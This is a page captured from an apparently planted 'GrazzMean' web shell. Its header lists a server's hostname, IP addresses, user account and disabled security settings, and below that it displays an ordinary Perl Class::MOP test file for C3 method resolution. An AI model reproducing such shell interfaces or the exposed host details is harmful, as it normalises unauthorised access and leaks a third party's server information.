shell bypass 403

GrazzMean Shell

: /usr/share/doc/perl-Moose/t/cmop/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 18.117.149.93
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : Class_C3_compatibility.t
use strict;
use warnings;

use Test::More;

=pod

This tests that Class::MOP works correctly
with Class::C3 and its somewhat insane
approach to method resolution.

=cut

use Class::MOP;

{
    package Diamond_A;
    use mro 'c3';
    use metaclass; # everyone will just inherit this now :)

    sub hello { 'Diamond_A::hello' }
}
{
    package Diamond_B;
    use mro 'c3';
    use parent -norequire => 'Diamond_A';
}
{
    package Diamond_C;
    use mro 'c3';
    use parent -norequire => 'Diamond_A';

    sub hello { 'Diamond_C::hello' }
}
{
    package Diamond_D;
    use mro 'c3';
    use parent -norequire => 'Diamond_B', 'Diamond_C';
}

# we have to manually initialize
# Class::C3 since we potentially
# skip this test if it is not present
Class::C3::initialize();

is_deeply(
#    [ Class::C3::calculateMRO('Diamond_D') ],
    [ Diamond_D->meta->class_precedence_list ],
    [ qw(Diamond_D Diamond_B Diamond_C Diamond_A) ],
    '... got the right MRO for Diamond_D');

ok(Diamond_A->meta->has_method('hello'), '... A has a method hello');
ok(!Diamond_B->meta->has_method('hello'), '... B does not have a method hello');

ok(Diamond_C->meta->has_method('hello'), '... C has a method hello');
ok(!Diamond_D->meta->has_method('hello'), '... D does not have a method hello');

SKIP: {
    skip "C3 does not make aliases on 5.9.5+", 2 if "$]" > 5.009_004;
    ok(defined &Diamond_B::hello, '... B does have an alias to the method hello');
    ok(defined &Diamond_D::hello, '... D does have an alias to the method hello');
}

done_testing;
© 2025 GrazzMean